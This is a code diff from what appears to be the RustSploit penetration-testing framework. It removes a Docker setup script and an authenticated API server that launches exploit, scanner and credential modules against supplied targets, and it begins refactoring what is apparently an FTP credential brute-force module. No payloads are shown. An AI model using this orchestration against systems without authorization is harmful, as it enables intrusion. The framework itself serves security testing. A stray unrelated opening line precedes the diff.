just lists like word lists
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@@ -1,327 +0,0 @@
#!/usr/bin/env python3
"""
Interactive generator for RustSploit Docker-Compose stack.
Produces:
docker-compose.rustsploit.yml (with embedded Dockerfile)
.env.rustsploit-docker
and prints the command to bring the stack up.
This variant includes runtime fixes to avoid permission-denied on /app/data
and ensures the container starts as root briefly to fix ownership, then
executes the rustsploit binary as the less-privileged `rustsploit` user.
"""
import secrets
import os
import stat
import socket
import ipaddress
import subprocess
import pwd
from pathlib import Path
# Fix: Use parent.parent since script is in scripts/ directory
repo = Path(__file__).resolve().parent.parent
if not (repo / "Cargo.toml").exists():
print("[-] Error: Run this script from the RustSploit repository root.")
print(f" Expected Cargo.toml at: {repo / 'Cargo.toml'}")
exit(1)
# ---------- Helper functions ----------
def ask(prompt, default=None, validator=None):
"""Interactive prompt with validation."""
suffix = f" [{default}]" if default is not None else ""
while True:
val = input(f"{prompt}{suffix}: ").strip()
if not val and default is not None:
val = default
if not val:
print("Value cannot be empty.")
continue
if validator:
try:
validator(val)
except ValueError as e:
print(f"Invalid input: {e}")
continue
return val
def ask_yes_no(prompt, default=True):
"""Yes/No prompt."""
hint = "Y/n" if default else "y/N"
while True:
val = input(f"{prompt} ({hint}): ").strip().lower()
if not val:
return default
if val in ("y", "yes"):
return True
if val in ("n", "no"):
return False
print("Please answer 'y' or 'n'.")
def validate_host(host):
"""Validate host/IP address."""
host = host.strip()
if not host:
raise ValueError("Host cannot be empty")
# Allow localhost
if host == "localhost":
return
# Try to parse as IP
try:
ipaddress.ip_address(host)
except ValueError:
# Not a valid IP, check if it's a valid hostname
if len(host) > 253:
raise ValueError("Hostname too long (max 253 chars)")
if any(c.isspace() for c in host):
raise ValueError("Hostname cannot contain whitespace")
def validate_port(port_str):
"""Validate port number."""
try:
port = int(port_str)
if not (1 <= port <= 65535):
raise ValueError("Port must be between 1 and 65535")
except ValueError as e:
if "invalid literal" in str(e):
raise ValueError("Port must be a number")
raise
def detect_private_ip():
"""Try to detect private IP address."""
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
sock.connect(("192.0.2.1", 80))
return sock.getsockname()[0]
except OSError:
return None
# ---------- Interactive prompts ----------
print("\n[+] RustSploit Docker Setup\n")
# Host selection
print("Select bind address:")
print(" [1] 127.0.0.1 (localhost only)")
print(" [2] 0.0.0.0 (all interfaces)")
print(" [3] Private LAN IP (auto-detect)")
print(" [4] Custom IP/hostname")
choice = ask("Choice", "2")
if choice == "1":
host = "127.0.0.1"
elif choice == "2":
host = "0.0.0.0"
elif choice == "3":
detected = detect_private_ip()
if detected:
print(f"[+] Detected private IP: {detected}")
use_detected = ask_yes_no("Use detected IP?", True)
host = detected if use_detected else ask("Enter IP/hostname", validator=validate_host)
else:
print("[-] Could not auto-detect private IP")
host = ask("Enter IP/hostname", validator=validate_host)
else:
host = ask("Enter IP/hostname", validator=validate_host)
# Port
# Default changed to 9000 as this is a common API port and matches user's prior usage
port_str = ask("Host port to expose", "9000", validator=validate_port)
port = int(port_str)
# API Key
print("\n[+] API Key Configuration")
generate_key = ask_yes_no("Generate random API key?", True)
if generate_key:
api_key = secrets.token_urlsafe(32)
print(f"[+] Generated API key: {api_key}")
else:
api_key = ask("Enter API key (ASCII, max 128 chars)", validator=lambda k: None if (len(k) <= 128 and all(32 <= ord(c) <= 126 for c in k)) else ValueError("API key must be printable ASCII, max 128 chars"))
# Hardening
print("\n[+] Security Hardening")
harden = ask_yes_no("Enable API hardening (auto-rotate key on suspicious activity)?", False)
ip_limit = 10
if harden:
ip_limit_str = ask("Max unique IPs before rotation", "10", validator=lambda v: validate_port(v) if v else None)
ip_limit = int(ip_limit_str)
# ---------- File generation ----------
env_file = ".env.rustsploit-docker"
compose_file = "docker-compose.rustsploit.yml"
env_path = repo / env_file
compose_path = repo / compose_file
# Check for existing .env file
if env_path.exists():
print(f"\n[!] Warning: {env_path.relative_to(repo)} already exists.")
if not ask_yes_no("Overwrite .env file?", False):
print("[-] Aborted.")
exit(0)
# Check for existing docker-compose file
if compose_path.exists():
print(f"\n[!] Warning: {compose_path.relative_to(repo)} already exists.")
if not ask_yes_no("Overwrite docker-compose file?", False):
print("[-] Aborted.")
exit(0)
# ---- .env ----
container_interface = f"0.0.0.0:{port}"
env_content = f"""RUSTSPLOIT_INTERFACE={container_interface}
RUSTSPLOIT_API_KEY={api_key}
RUSTSPLOIT_HARDEN={"true" if harden else "false"}
RUSTSPLOIT_IP_LIMIT={ip_limit}
"""
env_path.write_text(env_content)
# Set permissions: owner read/write only (0600) to keep API key private while still readable by docker-compose
os.chmod(env_path, stat.S_IRUSR | stat.S_IWUSR)
print(f"\n[+] Generated: {env_path}")
# Fix ownership if file was created with sudo (owned by root)
if env_path.stat().st_uid == 0:
print("[!] File was created as root. Fixing ownership...")
try:
# Get the actual user (SUDO_USER if running via sudo, otherwise current user)
user = os.environ.get('SUDO_USER') or os.environ.get('USER')
if not user:
user = pwd.getpwuid(os.getuid()).pw_name
# If we're running as root (via sudo), we can chown directly
if os.geteuid() == 0:
user_info = pwd.getpwnam(user)
os.chown(env_path, user_info.pw_uid, user_info.pw_gid)
print(f"[+] Ownership fixed: {user}:{user}")
else:
# Not root, need to use sudo
subprocess.run(['sudo', 'chown', f'{user}:{user}', str(env_path)], check=True)
print(f"[+] Ownership fixed: {user}:{user}")
except (subprocess.CalledProcessError, FileNotFoundError, KeyError) as e:
print(f"[!] Warning: Could not automatically fix ownership: {e}")
print(f" Please run manually: sudo chown $USER:$USER {env_path}")
# ---- docker-compose.yml with embedded Dockerfile ----
# Note: The serve stage runs the entrypoint as root so it can fix ownership of
# /app/data at container startup, then it drops privileges and executes the
# rustsploit binary as the less-privileged `rustsploit` user via runuser.
dockerfile_content = """FROM rust:1.83-slim AS builder
WORKDIR /workspace
ENV CARGO_TERM_COLOR=always
RUN apt-get update \\
&& apt-get install -y --no-install-recommends \\
build-essential \\
pkg-config \\
libssl-dev \\
libclang-dev \\
libpcap-dev \\
libsqlite3-dev \\
&& rm -rf /var/lib/apt/lists/*
COPY Cargo.toml ./
COPY Cargo.lock* ./
COPY . .
RUN cargo build --release --bin rustsploit
FROM debian:bookworm-slim AS serve
RUN apt-get update \\
&& apt-get install -y --no-install-recommends ca-certificates util-linux \\
&& rm -rf /var/lib/apt/lists/*
# create non-root user
RUN useradd --system --home /app --shell /usr/sbin/nologin rustsploit
WORKDIR /app
# create data dir (image-level), but runtime entrypoint will chown the volume target
RUN mkdir -p /app/data && chown rustsploit:rustsploit /app/data
COPY --from=builder /workspace/target/release/rustsploit /usr/local/bin/rustsploit
# entrypoint runs as root (default) so it can fix ownership of mounted volumes
RUN echo '#!/bin/sh' > /entrypoint.sh && \\
echo 'set -e' >> /entrypoint.sh && \\
echo 'ARGS="--api --api-key \"${RUSTSPLOIT_API_KEY}\" --interface \"${RUSTSPLOIT_INTERFACE}\""' >> /entrypoint.sh && \\
echo 'if [ "\"$RUSTSPLOIT_HARDEN\"" = "\"true\"" ]; then' >> /entrypoint.sh && \\
echo ' ARGS="$ARGS --harden"' >> /entrypoint.sh && \\
echo ' if [ -n "\"$RUSTSPLOIT_IP_LIMIT\"" ]; then' >> /entrypoint.sh && \\
echo ' ARGS="$ARGS --ip-limit $RUSTSPLOIT_IP_LIMIT"' >> /entrypoint.sh && \\
echo ' fi' >> /entrypoint.sh && \\
echo 'fi' >> /entrypoint.sh && \\
# ensure data dir exists and is owned by rustsploit so that non-root process can write
echo 'mkdir -p /app/data' >> /entrypoint.sh && \\
echo 'mkdir -p /app/data/logs || true' >> /entrypoint.sh && \\
echo 'chown -R rustsploit:rustsploit /app/data || true' >> /entrypoint.sh && \\
echo 'LOG_FILE=/app/data/logs/rustsploit_api.log' >> /entrypoint.sh && \\
echo 'touch "$LOG_FILE" || true' >> /entrypoint.sh && \\
echo 'chown rustsploit:rustsploit "$LOG_FILE" || true' >> /entrypoint.sh && \\
echo 'ln -sf "$LOG_FILE" /app/rustsploit_api.log || true' >> /entrypoint.sh && \\
# finally, execute rustsploit as the rustsploit user using runuser
echo 'exec runuser -u rustsploit -- /usr/local/bin/rustsploit $ARGS' >> /entrypoint.sh && \\
chmod +x /entrypoint.sh && \\
chown root:root /entrypoint.sh && \\
chown root:root /usr/local/bin/rustsploit
# keep default user root so entrypoint can perform ownership fixes; runtime drops to rustsploit
EXPOSE 8080
ENTRYPOINT ["/entrypoint.sh"]
"""
# Create Dockerfile in repo root (hardcoded in script, not in docker/ folder)
dockerfile_path = repo / "Dockerfile.rustsploit"
dockerfile_path.write_text(dockerfile_content)
print(f"[+] Generated: {dockerfile_path}")
# Generate docker-compose.yml
compose_content = f"""# Generated by {Path(__file__).name}
services:
rustsploit-api:
container_name: rustsploit-api
build:
context: .
dockerfile: Dockerfile.rustsploit
target: serve
restart: unless-stopped
env_file:
- {env_file}
ports:
- "{host}:{port}:{port}"
security_opt:
- no-new-privileges:true
tmpfs:
- /tmp
volumes:
- rustsploit-data:/app/data
volumes:
rustsploit-data:
name: rustsploit-data
"""
compose_path.write_text(compose_content)
print(f"[+] Generated: {compose_path}")
print("\n[+] Setup complete!")
print("\n[+] Generated files:")
print(f" - {env_path.relative_to(repo)}")
print(f" - {compose_path.relative_to(repo)}")
print(f" - {dockerfile_path.relative_to(repo)}")
print(f"\n[!] Note: Run docker compose commands from the repository root:")
print(f" cd {repo}")
print("\n[+] To start the stack, run:")
print(f" cd {repo} && docker compose -f {compose_file} up -d --build")
print(f" # OR from any directory:")
print(f" docker compose -f {compose_path} up -d --build")
print("\n[+] To view logs:")
print(f" cd {repo} && docker compose -f {compose_file} logs -f")
print(f" # OR from any directory:")
print(f" docker compose -f {compose_path} logs -f")
print("\n[+] To stop the stack:")
print(f" cd {repo} && docker compose -f {compose_file} down")
print(f" # OR from any directory:")
print(f" docker compose -f {compose_path} down")
-724
View File
@@ -1,724 +0,0 @@
use anyhow::{Context, Result};
use axum::{
extract::{ConnectInfo, Request, State},
http::{HeaderMap, StatusCode},
middleware::Next,
response::{IntoResponse, Response},
routing::{get, post},
Json, Router,
};
use std::net::SocketAddr;
use chrono::{DateTime, Utc};
use serde::{Deserialize, Serialize};
use std::{
collections::HashMap,
path::PathBuf,
sync::Arc,
};
use tokio::{
fs::OpenOptions,
io::AsyncWriteExt,
sync::RwLock,
};
use tower::ServiceBuilder;
use tower_http::trace::TraceLayer;
use uuid::Uuid;
use crate::commands;
#[derive(Clone, Debug)]
pub struct ApiKey {
pub key: String,
pub created_at: DateTime<Utc>,
}
#[derive(Clone, Debug, Serialize)]
pub struct IpTracker {
pub ip: String,
pub first_seen: DateTime<Utc>,
pub last_seen: DateTime<Utc>,
pub request_count: u32,
}
#[derive(Clone, Debug, Serialize)]
pub struct AuthFailureTracker {
pub ip: String,
pub failed_attempts: u32,
pub first_failure: DateTime<Utc>,
pub blocked_until: Option<DateTime<Utc>>,
}
#[derive(Clone)]
pub struct ApiState {
pub current_key: Arc<RwLock<ApiKey>>,
pub ip_tracker: Arc<RwLock<HashMap<String, IpTracker>>>,
pub auth_failures: Arc<RwLock<HashMap<String, AuthFailureTracker>>>,
pub harden_enabled: bool,
pub ip_limit: u32,
pub log_file: PathBuf,
}
#[derive(Serialize, Deserialize)]
pub struct ApiResponse {
pub success: bool,
pub message: String,
pub data: Option<serde_json::Value>,
}
#[derive(Serialize, Deserialize)]
pub struct RunModuleRequest {
pub module: String,
pub target: String,
}
#[derive(Serialize, Deserialize)]
pub struct ListModulesResponse {
pub exploits: Vec<String>,
pub scanners: Vec<String>,
pub creds: Vec<String>,
}
// ----------------------
// Validation utilities
// ----------------------
fn sanitize_for_log(input: &str) -> String {
let mut s = input.replace(['\r', '\n', '\t'], " ");
if s.len() > 500 {
s.truncate(500);
s.push_str("");
}
s
}
fn is_printable_ascii(s: &str) -> bool {
s.chars().all(|c| c.is_ascii_graphic() || c == ' ' || c == '/' || c == ':' || c == '.')
}
fn validate_api_key_format(key: &str) -> bool {
!key.is_empty() && key.len() <= 128 && key.chars().all(|c| c.is_ascii_graphic())
}
fn validate_module_name(module: &str) -> bool {
// Allow only expected module path forms, e.g., "exploits/x", "scanners/y", "creds/z"
if module.is_empty() || module.len() > 200 { return false; }
if !module.chars().all(|c| c.is_ascii_lowercase() || c.is_ascii_digit() || c == '/' || c == '_' || c == '-') {
return false;
}
let parts: Vec<&str> = module.split('/').collect();
if parts.len() < 2 { return false; }
matches!(parts[0], "exploits" | "scanners" | "creds")
}
fn validate_target(target: &str) -> bool {
if target.is_empty() || target.len() > 2048 { return false; }
if !is_printable_ascii(target) { return false; }
// Basic sanity: avoid spaces at ends and double CRLF injections
let trimmed = target.trim();
trimmed == target && !target.contains("\r\n\r\n")
}
impl ApiState {
pub fn new(initial_key: String, harden: bool, ip_limit: u32) -> Self {
let log_file = std::env::current_dir()
.unwrap_or_else(|_| PathBuf::from("."))
.join("rustsploit_api.log");
Self {
current_key: Arc::new(RwLock::new(ApiKey {
key: initial_key,
created_at: Utc::now(),
})),
ip_tracker: Arc::new(RwLock::new(HashMap::new())),
auth_failures: Arc::new(RwLock::new(HashMap::new())),
harden_enabled: harden,
ip_limit,
log_file,
}
}
pub async fn rotate_key(&self) -> Result<String> {
let new_key = Uuid::new_v4().to_string();
let mut key_guard = self.current_key.write().await;
key_guard.key = new_key.clone();
key_guard.created_at = Utc::now();
drop(key_guard);
// Clear IP tracker on rotation
let mut tracker_guard = self.ip_tracker.write().await;
tracker_guard.clear();
drop(tracker_guard);
self.log_message(&format!(
"[SECURITY] API key rotated at {}",
Utc::now().format("%Y-%m-%d %H:%M:%S UTC")
))
.await?;
Ok(new_key)
}
pub async fn track_ip(&self, ip: &str) -> Result<bool> {
if !self.harden_enabled {
return Ok(false);
}
let mut tracker_guard = self.ip_tracker.write().await;
let now = Utc::now();
if let Some(tracker) = tracker_guard.get_mut(ip) {
// Update existing tracker - use all fields
tracker.last_seen = now;
tracker.request_count += 1;
// Log detailed tracking info using first_seen
let duration = now.signed_duration_since(tracker.first_seen);
let _ = self.log_message(&format!(
"[TRACKING] IP {}: {} requests since {} ({} seconds ago)",
tracker.ip,
tracker.request_count,
tracker.first_seen.format("%Y-%m-%d %H:%M:%S UTC"),
duration.num_seconds()
)).await;
} else {
// Create new tracker - all fields are set and will be used
let new_tracker = IpTracker {
ip: ip.to_string(),
first_seen: now,
last_seen: now,
request_count: 1,
};
// Log new IP using all fields
let _ = self.log_message(&format!(
"[TRACKING] New IP detected: {} (first seen: {})",
new_tracker.ip,
new_tracker.first_seen.format("%Y-%m-%d %H:%M:%S UTC")
)).await;
tracker_guard.insert(ip.to_string(), new_tracker);
}
let unique_ips = tracker_guard.len() as u32;
drop(tracker_guard);
if unique_ips > self.ip_limit {
let new_key = self.rotate_key().await?;
self.log_message(&format!(
"[HARDENING] Auto-rotated API key due to {} unique IPs exceeding limit of {}. New key: {}",
unique_ips, self.ip_limit, new_key
))
.await?;
println!(
"⚠️ [HARDENING] API key auto-rotated! {} unique IPs exceeded limit of {}",
unique_ips, self.ip_limit
);
println!("⚠️ New API key: {}", new_key);
return Ok(true);
}
Ok(false)
}
pub async fn log_message(&self, message: &str) -> Result<()> {
let timestamp = Utc::now().format("%Y-%m-%d %H:%M:%S UTC");
let safe = sanitize_for_log(message);
let log_entry = format!("[{}] {}\n", timestamp, safe);
// Log to terminal
println!("{}", log_entry.trim());
// Log to file
let mut file = OpenOptions::new()
.create(true)
.append(true)
.open(&self.log_file)
.await
.context("Failed to open log file")?;
file.write_all(log_entry.as_bytes())
.await
.context("Failed to write to log file")?;
Ok(())
}
pub async fn verify_key(&self, provided_key: &str) -> bool {
let key_guard = self.current_key.read().await;
key_guard.key == provided_key
}
pub async fn check_auth_rate_limit(&self, ip: &str) -> Result<bool> {
let mut failures_guard = self.auth_failures.write().await;
let now = Utc::now();
if let Some(tracker) = failures_guard.get_mut(ip) {
// Check if IP is currently blocked
if let Some(blocked_until) = tracker.blocked_until {
if now < blocked_until {
let remaining = (blocked_until - now).num_seconds();
self.log_message(&format!(
"[RATE_LIMIT] IP {} is blocked for {} more seconds ({} failed attempts)",
ip, remaining, tracker.failed_attempts
))
.await?;
return Ok(false); // Blocked
} else {
// Block period expired, reset
tracker.failed_attempts = 0;
tracker.blocked_until = None;
self.log_message(&format!(
"[RATE_LIMIT] Block period expired for IP {}, resetting counter",
ip
))
.await?;
}
}
}
Ok(true) // Not blocked
}
pub async fn record_auth_failure(&self, ip: &str) -> Result<()> {
let mut failures_guard = self.auth_failures.write().await;
let now = Utc::now();
let tracker = failures_guard.entry(ip.to_string()).or_insert_with(|| {
AuthFailureTracker {
ip: ip.to_string(),
failed_attempts: 0,
first_failure: now,
blocked_until: None,
}
});
// Set first_failure if this is the first attempt
if tracker.failed_attempts == 0 {
tracker.first_failure = now;
}
tracker.failed_attempts += 1;
// Block after 3 failed attempts for 30 seconds
if tracker.failed_attempts >= 3 {
let block_until = now + chrono::Duration::seconds(30);
tracker.blocked_until = Some(block_until);
let duration_since_first = (now - tracker.first_failure).num_seconds();
self.log_message(&format!(
"[RATE_LIMIT] IP {} blocked for 30 seconds after {} failed authentication attempts (first failure: {}, {} seconds since first)",
tracker.ip, tracker.failed_attempts,
tracker.first_failure.format("%Y-%m-%d %H:%M:%S UTC"),
duration_since_first
))
.await?;
println!(
"🚫 [RATE_LIMIT] IP {} blocked for 30 seconds ({} failed attempts since {})",
tracker.ip, tracker.failed_attempts,
tracker.first_failure.format("%Y-%m-%d %H:%M:%S UTC")
);
} else {
self.log_message(&format!(
"[RATE_LIMIT] IP {} failed authentication attempt {}/3 (first failure: {})",
tracker.ip, tracker.failed_attempts,
tracker.first_failure.format("%Y-%m-%d %H:%M:%S UTC")
))
.await?;
}
Ok(())
}
pub async fn reset_auth_failures(&self, ip: &str) -> Result<()> {
let mut failures_guard = self.auth_failures.write().await;
if let Some(tracker) = failures_guard.get_mut(ip) {
if tracker.failed_attempts > 0 {
self.log_message(&format!(
"[RATE_LIMIT] Resetting auth failure counter for IP {} (was {} attempts)",
ip, tracker.failed_attempts
))
.await?;
}
tracker.failed_attempts = 0;
tracker.blocked_until = None;
}
Ok(())
}
}
async fn auth_middleware(
State(state): State<ApiState>,
headers: HeaderMap,
request: Request,
next: Next,
) -> Response {
// Extract IP address first - try to get from headers first (for proxied requests)
let client_ip = headers
.get("x-forwarded-for")
.or_else(|| headers.get("x-real-ip"))
.and_then(|h| h.to_str().ok())
.map(|s| {
s.split(',')
.next()
.unwrap_or("")
.trim()
.to_string()
})
.filter(|s| !s.is_empty());
// Fall back to direct connection IP from request extensions
let client_ip = if let Some(ip) = client_ip {
ip
} else if let Some(addr) = request.extensions().get::<ConnectInfo<SocketAddr>>() {
addr.ip().to_string()
} else {
"unknown".to_string()
};
// Check rate limit before processing authentication
if client_ip != "unknown" {
if let Ok(allowed) = state.check_auth_rate_limit(&client_ip).await {
if !allowed {
let response = ApiResponse {
success: false,
message: "Too many failed authentication attempts. Please try again in 30 seconds.".to_string(),
data: None,
};
return (StatusCode::TOO_MANY_REQUESTS, Json(response)).into_response();
}
}
}
// Extract API key from Authorization header
let auth_header = headers
.get("Authorization")
.and_then(|h| h.to_str().ok())
.unwrap_or("");
let provided_key = if auth_header.starts_with("Bearer ") {
&auth_header[7..]
} else if auth_header.starts_with("ApiKey ") {
&auth_header[7..]
} else {
auth_header
};
// Basic key format validation
if !validate_api_key_format(provided_key) {
let response = ApiResponse {
success: false,
message: "Malformed API key".to_string(),
data: None,
};
return (StatusCode::UNAUTHORIZED, Json(response)).into_response();
}
// Verify API key
let is_valid = state.verify_key(provided_key).await;
if !is_valid {
// Record failed authentication attempt
if client_ip != "unknown" {
let _ = state.record_auth_failure(&client_ip).await;
}
let response = ApiResponse {
success: false,
message: "Invalid API key".to_string(),
data: None,
};
return (StatusCode::UNAUTHORIZED, Json(response)).into_response();
}
// Successful authentication - reset failure counter for this IP
if client_ip != "unknown" {
let _ = state.reset_auth_failures(&client_ip).await;
}
// Track IP for hardening (if enabled)
let _ = state.track_ip(&client_ip).await;
next.run(request).await
}
async fn health_check() -> Json<ApiResponse> {
Json(ApiResponse {
success: true,
message: "API is running".to_string(),
data: None,
})
}
async fn list_modules(State(_state): State<ApiState>) -> Json<ApiResponse> {
let modules = commands::discover_modules();
let mut exploits = Vec::new();
let mut scanners = Vec::new();
let mut creds = Vec::new();
for module in modules {
if module.starts_with("exploits/") {
exploits.push(module);
} else if module.starts_with("scanners/") {
scanners.push(module);
} else if module.starts_with("creds/") {
creds.push(module);
}
}
let data = ListModulesResponse {
exploits,
scanners,
creds,
};
Json(ApiResponse {
success: true,
message: "Modules retrieved successfully".to_string(),
data: Some(serde_json::to_value(data).unwrap()),
})
}
async fn run_module(
State(state): State<ApiState>,
Json(payload): Json<RunModuleRequest>,
) -> Result<Json<ApiResponse>, StatusCode> {
let module_name_raw = payload.module.as_str();
let target_raw = payload.target.as_str();
// Validate inputs
if !validate_module_name(module_name_raw) {
return Err(StatusCode::BAD_REQUEST);
}
if !validate_target(target_raw) {
return Err(StatusCode::BAD_REQUEST);
}
// Sanitize for logging only
let module_name = sanitize_for_log(module_name_raw);
let target_name = sanitize_for_log(target_raw);
state
.log_message(&format!(
"API request: run module '{}' on target '{}'",
module_name, target_name
))
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
// Run the module in a separate OS thread since some modules aren't Send
let module = payload.module.clone();
let target = payload.target.clone();
let state_clone = state.clone();
// Use std::thread to run in a separate OS thread with its own runtime
std::thread::spawn(move || {
// Create a new runtime for this thread since modules need async runtime
let rt = tokio::runtime::Runtime::new().unwrap();
rt.block_on(async {
if let Err(e) = commands::run_module(&module, &target).await {
let _ = state_clone
.log_message(&format!("Error running module: {}", sanitize_for_log(&e.to_string())))
.await;
} else {
let _ = state_clone
.log_message(&format!(
"Successfully completed module '{}' on target '{}'",
sanitize_for_log(&module), sanitize_for_log(&target)
))
.await;
}
});
});
Ok(Json(ApiResponse {
success: true,
message: format!("Module '{}' execution started for target '{}'", module_name, target_name),
data: None,
}))
}
async fn get_status(State(state): State<ApiState>) -> Json<ApiResponse> {
let key_guard = state.current_key.read().await;
let tracker_guard = state.ip_tracker.read().await;
// Collect all tracked IPs with their details
let tracked_ips: Vec<&IpTracker> = tracker_guard.values().collect();
let ip_details: Vec<serde_json::Value> = tracked_ips
.iter()
.map(|tracker| {
serde_json::json!({
"ip": tracker.ip,
"first_seen": tracker.first_seen.to_rfc3339(),
"last_seen": tracker.last_seen.to_rfc3339(),
"request_count": tracker.request_count,
})
})
.collect();
let status_data = serde_json::json!({
"harden_enabled": state.harden_enabled,
"ip_limit": state.ip_limit,
"unique_ips": tracker_guard.len(),
"key_created_at": key_guard.created_at.to_rfc3339(),
"log_file": state.log_file.to_string_lossy(),
"tracked_ips": ip_details,
});
Json(ApiResponse {
success: true,
message: "Status retrieved successfully".to_string(),
data: Some(status_data),
})
}
async fn rotate_key_endpoint(State(state): State<ApiState>) -> Result<Json<ApiResponse>, StatusCode> {
let new_key = state
.rotate_key()
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
Ok(Json(ApiResponse {
success: true,
message: "API key rotated successfully".to_string(),
data: Some(serde_json::json!({ "new_key": new_key })),
}))
}
async fn get_tracked_ips(State(state): State<ApiState>) -> Json<ApiResponse> {
let tracker_guard = state.ip_tracker.read().await;
let failures_guard = state.auth_failures.read().await;
// Use all fields from IpTracker
let ips: Vec<serde_json::Value> = tracker_guard
.values()
.map(|tracker| {
// Get auth failure info for this IP if it exists
let auth_info = failures_guard.get(&tracker.ip).map(|fail| {
serde_json::json!({
"failed_attempts": fail.failed_attempts,
"first_failure": fail.first_failure.to_rfc3339(),
"blocked_until": fail.blocked_until.map(|dt| dt.to_rfc3339()),
"is_blocked": fail.blocked_until.map(|dt| Utc::now() < dt).unwrap_or(false),
})
});
serde_json::json!({
"ip": tracker.ip,
"first_seen": tracker.first_seen.to_rfc3339(),
"last_seen": tracker.last_seen.to_rfc3339(),
"request_count": tracker.request_count,
"duration_seconds": (tracker.last_seen - tracker.first_seen).num_seconds(),
"auth_failures": auth_info,
})
})
.collect();
Json(ApiResponse {
success: true,
message: format!("Retrieved {} tracked IP addresses", ips.len()),
data: Some(serde_json::json!({ "ips": ips })),
})
}
async fn get_auth_failures(State(state): State<ApiState>) -> Json<ApiResponse> {
let failures_guard = state.auth_failures.read().await;
let now = Utc::now();
// Use all fields from AuthFailureTracker
let failures: Vec<serde_json::Value> = failures_guard
.values()
.map(|tracker| {
let is_blocked = tracker.blocked_until
.map(|blocked_until| now < blocked_until)
.unwrap_or(false);
let remaining_seconds = if is_blocked {
tracker.blocked_until
.map(|blocked_until| (blocked_until - now).num_seconds())
.unwrap_or(0)
} else {
0
};
serde_json::json!({
"ip": tracker.ip,
"failed_attempts": tracker.failed_attempts,
"first_failure": tracker.first_failure.to_rfc3339(),
"blocked_until": tracker.blocked_until.map(|dt| dt.to_rfc3339()),
"is_blocked": is_blocked,
"remaining_block_seconds": remaining_seconds,
"duration_since_first": (now - tracker.first_failure).num_seconds(),
})
})
.collect();
Json(ApiResponse {
success: true,
message: format!("Retrieved {} IPs with authentication failures", failures.len()),
data: Some(serde_json::json!({ "auth_failures": failures })),
})
}
pub async fn start_api_server(
bind_address: &str,
api_key: String,
harden: bool,
ip_limit: u32,
) -> Result<()> {
let state = ApiState::new(api_key.clone(), harden, ip_limit);
// Log initial startup
state
.log_message(&format!(
"Starting API server on {} with hardening: {}, IP limit: {}",
bind_address, harden, ip_limit
))
.await?;
println!("🚀 Starting RustSploit API server...");
println!("📍 Binding to: {}", bind_address);
println!("🔑 Initial API key: {}", api_key);
println!("🛡️ Hardening mode: {}", if harden { "ENABLED" } else { "DISABLED" });
if harden {
println!("📊 IP limit: {}", ip_limit);
}
println!("📝 Log file: {}", state.log_file.display());
// Create routes that require authentication
let protected_routes = Router::new()
.route("/api/modules", get(list_modules))
.route("/api/run", post(run_module))
.route("/api/status", get(get_status))
.route("/api/rotate-key", post(rotate_key_endpoint))
.route("/api/ips", get(get_tracked_ips))
.route("/api/auth-failures", get(get_auth_failures))
.layer(axum::middleware::from_fn_with_state(
state.clone(),
auth_middleware,
));
let app = Router::new()
.route("/health", get(health_check))
.merge(protected_routes)
.layer(ServiceBuilder::new().layer(TraceLayer::new_for_http()).into_inner())
.with_state(state);
let listener = tokio::net::TcpListener::bind(bind_address)
.await
.context(format!("Failed to bind to {}", bind_address))?;
println!("✅ API server is running! Use the API key in Authorization header.");
println!("📖 Example: curl -H 'Authorization: Bearer {}' http://{}/api/modules", api_key, bind_address);
axum::serve(
listener,
app.into_make_service_with_connect_info::<SocketAddr>(),
)
.await
.context("API server error")?;
Ok(())
}
+1 -21
View File
@@ -6,7 +6,7 @@ use clap::{ArgGroup, Parser};
#[clap(group(
ArgGroup::new("mode")
.required(false)
.args(&["command", "api"])
.args(&["command"])
))]
pub struct Cli {
/// Subcommand to run (e.g. "exploit", "scanner", "creds")
@@ -19,24 +19,4 @@ pub struct Cli {
/// Module name to use
#[arg(short, long)]
pub module: Option<String>,
/// Launch API server mode
#[arg(long)]
pub api: bool,
/// API key for authentication (required when --api is used)
#[arg(long, requires = "api")]
pub api_key: Option<String>,
/// Enable hardening mode (auto-rotate API key on suspicious activity)
#[arg(long, requires = "api")]
pub harden: bool,
/// Network interface to bind API server to (default: 0.0.0.0)
#[arg(long, requires = "api", default_value = "0.0.0.0")]
pub interface: Option<String>,
/// IP limit for hardening mode (default: 10 unique IPs)
#[arg(long, requires = "harden", default_value = "10")]
pub ip_limit: Option<u32>,
}
+1 -23
View File
@@ -1,4 +1,4 @@
use anyhow::{Context, Result};
use anyhow::Result;
use clap::Parser;
mod cli;
@@ -6,34 +6,12 @@ mod shell;
mod commands;
mod modules;
mod utils;
mod api;
#[tokio::main]
async fn main() -> Result<()> {
// Parse command-line arguments
let cli_args = cli::Cli::parse();
// Check if API mode is requested
if cli_args.api {
let api_key = cli_args
.api_key
.context("--api-key is required when using --api mode")?;
let interface = cli_args.interface.unwrap_or_else(|| "0.0.0.0".to_string());
// If interface already contains a port (has ':'), use it as-is, otherwise add default port
let bind_address = if interface.contains(':') {
interface
} else {
format!("{}:8080", interface)
};
let harden = cli_args.harden;
let ip_limit = cli_args.ip_limit.unwrap_or(10);
api::start_api_server(&bind_address, api_key, harden, ip_limit).await?;
return Ok(());
}
// If user provided subcommands (e.g., "exploit", "scan", etc.) from CLI, handle them directly:
if let Some(cmd) = &cli_args.command {
commands::handle_command(cmd, &cli_args).await?;
+102 -90
View File
@@ -1,18 +1,52 @@
use anyhow::{anyhow, Result};
use colored::*;
use suppaftp::{AsyncFtpStream, AsyncNativeTlsConnector, AsyncNativeTlsFtpStream};
use suppaftp::{
AsyncFtpStream,
AsyncNativeTlsFtpStream,
AsyncNativeTlsConnector,
};
use suppaftp::async_native_tls::TlsConnector;
use std::{
fs::File,
io::{BufRead, BufReader, Write},
path::PathBuf,
sync::Arc,
sync::Arc, // Keep Arc
};
use tokio::{
sync::{Mutex, Semaphore}, // Import Semaphore
time::{sleep, Duration}
};
use std::path::Path;
use std::sync::atomic::{AtomicBool, Ordering};
use tokio::{sync::{Mutex, Semaphore}, time::{sleep, Duration}};
use sysinfo::System;
use futures::stream::{FuturesUnordered, StreamExt};
async fn dynamic_throttle(running: usize, max_concurrency: usize) {
let mut system = System::new_all();
system.refresh_all();
let cpu_count = system.cpus().len();
let cpu_usage = if cpu_count > 0 {
system.cpus().iter().map(|cpu| cpu.cpu_usage()).sum::<f32>() / cpu_count as f32
} else {
0.0
};
let total_memory = system.total_memory();
let ram_used = if total_memory > 0 {
system.used_memory() as f32 / total_memory as f32
} else {
0.0
};
